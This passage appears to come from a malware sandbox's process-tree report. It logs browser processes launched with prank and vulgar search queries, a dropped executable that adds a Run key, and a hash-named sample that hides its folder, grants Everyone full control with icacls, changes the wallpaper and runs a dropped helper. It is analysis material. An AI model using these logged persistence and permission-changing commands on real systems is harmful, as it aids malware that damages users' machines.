      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:1
      4⤵
      PID:5848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
      4⤵
      PID:5860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7612 /prefetch:1
      4⤵
      PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7536 /prefetch:1
      4⤵
      PID:7124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
      4⤵
      PID:5848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8180 /prefetch:1
      4⤵
      PID:6408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8084 /prefetch:1
      4⤵
      PID:3924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7808 /prefetch:2
      4⤵
      PID:376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8028 /prefetch:1
      4⤵
      PID:7548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1
      4⤵
      PID:7608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7684 /prefetch:8
      4⤵
      PID:8160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8596 /prefetch:1
      4⤵
      PID:7504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8920 /prefetch:1
      4⤵
      PID:7792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8744 /prefetch:1
      4⤵
      PID:6836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8800 /prefetch:1
      4⤵
      PID:7288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
      4⤵
      PID:8152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
      4⤵
      PID:7060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9188 /prefetch:1
      4⤵
      PID:7196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1
      4⤵
      PID:264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.yahoo.com/search;?p=free+midi+download
    3⤵
    PID:2300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://ask.com/web?q=grand+dad+rom+download
    3⤵
    PID:1216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=limp+bizkit+mp3+download
    3⤵
    PID:6744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:5948
- - C:\Users\Admin\AppData\Local\Temp\Data\tree.exe
    "C:\Users\Admin\AppData\Local\Temp\Data\tree.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=preventon+antivirus+download
    3⤵
    PID:5184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:3628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.yahoo.com/search;?p=mp3+midi+converter
    3⤵
    PID:2744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:2108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.bing.com/search?q=john+cena+midi+legit+not+converted
    3⤵
    PID:1792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0xf8,0x134,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:4804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=animated+christmas+tree+for+desktop
    3⤵
    PID:3112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6944
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=cool+toolbars
    3⤵
    PID:6208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=how+to+get+cursormania+in+2016
    3⤵
    PID:5204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:5792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=pussy+destroyer
    3⤵
    PID:32
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=smash+mouth+all+star+midi
    3⤵
    PID:3832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://ask.com/web?q=cortana+is+the+new+bonzi
    3⤵
    PID:2196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=fuck+bees
    3⤵
    PID:5456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.youtube.com/results?search_query=tootorals
    3⤵
    PID:7448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:7464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=skrillex+scay+onster+an+nice+sprites+midi
    3⤵
    PID:5644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:4852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=smileystoolbar+download
    3⤵
    PID:4592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:5216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=bonzi+buddy+download+free
    3⤵
    PID:8112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:7176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=expand+dong
    3⤵
    PID:1832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6572

C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:4032
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:1324
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:2616
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
